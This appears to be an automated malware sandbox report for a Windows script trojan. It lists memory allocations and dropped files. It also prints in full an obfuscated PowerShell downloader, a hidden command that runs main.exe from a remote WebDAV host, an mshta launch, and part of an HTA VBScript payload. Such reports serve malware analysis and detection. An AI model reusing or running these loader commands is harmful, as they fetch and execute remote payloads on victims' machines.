NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02511000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02512000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02555000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02503000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02504000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02505000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02506000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02507000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02508000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02509000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04931000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04932000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04933000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04934000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04935000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04936000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04937000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04938000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04939000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0493a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0493b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0493c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0493d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0493e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0493f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a43000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\download.ps1
file	C:\Users\test22\AppData\Roaming\main.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (5 events)

cmdline	powershell -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Local\Temp\download.ps1
cmdline	powershell.exe -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe
cmdline	mshta C:\Users\test22\AppData\Local\Temp\artwork.hta

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Oct. 17, 2023, 10:03 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT; filepath: powershell.exe	1	1	0
CreateProcessInternalW Oct. 17, 2023, 10:03 a.m.	thread_identifier: 2748 thread_handle: 0x00000088 process_identifier: 2744 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1	0

File has been identified by one AntiVirus engine on VirusTotal as malicious (1 event)

Microsoft

Trojan:Script/Malgent!MSR

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 17, 2023, 10:03 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (6 events)

Data received	HTTP/1.1 200 OK Content-Length: 17197 Last-Modified: Sat, 14 Oct 2023 11:48:56 GMT Content-Type: application/hta Date: Tue, 17 Oct 2023 01:04:14 GMT ETag: "7da9930adc85c54d0e2b7dc739a7f159-1697284136-17197" Accept-Ranges: bytes Server: WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.1
Data received	4,70671,70741,70729,70737,70742,70678,70730,70729,70748,70671,70691,70664,70737,70734,70664,70672,70716,70733,70747,70748,70677,70712,70729,70748,70736,70664,70677,70712,70729,70748,70736,70664,70668,70718,70732,70712,70754,70754,70700,70742,70743,70729,70701,70673,70755,70734,70737,70717,70752,70747,70735,70712,70698,70706,70721,70709,70742,70707,70701,70730,70753,70664,70668,70718,70732,70712,70754,70754,70700,70742,70743,70729,70701,70691,70757,70701,70740,70747,70733,70755,70664,70668,70741,70708,70714,70744,70722,70731,70737,70664,70693,70664,70729,70710,70720,70735,70701,70717,70738,70697,70720,70713,70749,70734,70747,70699,70733,70699,70749,70743,70664,70672,70700,70714,70748,70708,70710,70740,70751,70735,70745,70751,70738,70742,70707,70722,70700,70752,70732,70697,70664,70696,70672,70685,70683,70684,70686,70685,70676,70685,70683,70684,70687,70687,70676,70685,70683,70684,70687,70687,70676,70685,70683,70684,70687,70683,70676,70685,70683,70684,70681,70689,70676,70685,70683,70684,70680,70688,70676,70685,70683,70684,70680,70688,70676,70685,70683,70684,70681,70688,70676,70685,70683,70684,70681,70680,70676,70685,70683,70684,70680,70687,70676,70685,70683,70684,70681,70681,70676,70685,70683,70684,70680,70689,70676,70685,70683,70684,70681,70686,70676,70685,70683,70684,70680,70687,70676,70685,70683,70684,70681,70680,70676,70685,70683,70684,70681,70687,70676,70685,70683,70684,70681,70682,70676,70685,70683,70684,70680,70687,70676,70685,70683,70684,70681,70688,70676,70685,70683,70684,70681,70689,70676,70685,70683,70684,70681,70687,70676,70685,70683,70684,70680,70689,70676,70685,70683,70684,70680,70689,70676,70685,70683,70684,70680,70689,70676,70685,70683,70684,70680,70688,70676,70685,70683,70684,70687,70680,70676,70685,70683,70684,70685,70688,70676,70685,70683,70684,70686,70686,70676,70685,70683,70684,70687,70681,70676,70685,70683,70684,70680,70687,70676,70685,70683,70684,70685,70689,70676,70685,70683,70684,70685,70688,70676,70685,70683,70684,70687,70687,70673,70673,70691,70720,70710,70717,70702,70750,70747,70732,70752,70698,70753,70664,70668,70718,70732,70712,70754,70754,70700,70742,70743,70729,70701,70664,70668,70741,70708,70714,70744,70722,70731,70737,70691,70734,70737,70717,70752,70747,70735,70712,70698,70706,70721,70709,70742,70707,70701,70730,70753,70664,70668,70718,70732,70712,70754,70754,70700,70742,70743,70729,70701,70691,70757,70691,70732,70713,70703,70743,70729,70737,70742,70735,70711,70715,70731,70731,70664,70668,70718,70732,70712,70754,70754,70700,70742,70743,70729,70701,70691,70691,70691,70691,70691,70757,70703,70754,70704,70712,70751,70742,70747,70751,70700,70698,70716,70691) kvjpjfHoqZ = DURqHjj(GHRmYavQNEL) Dim dSYxoInDSCHsZl Set dSYxoInDSCHsZl = MquXY(DURqHjj(Array(70719,70747,70731,70746,70737,70744,70748,70678,70715,70736,70733,70740,70740))) dSYxoInDSCHsZl.Run(kvjpjfHoqZ),0,true self.close() End Function Function znRkMWSHxewaBf(ByVal qZmNKUKXeTBL) znRkMWSHxewaBf = VarType( qZmNKUKXeTBL) End Function Function MquXY(ByVal objectType) Set MquXY = CreateObject(objectType) End Function mNmODwSSyWNMsX() </script> </head> </html>
Data received
Data received	F
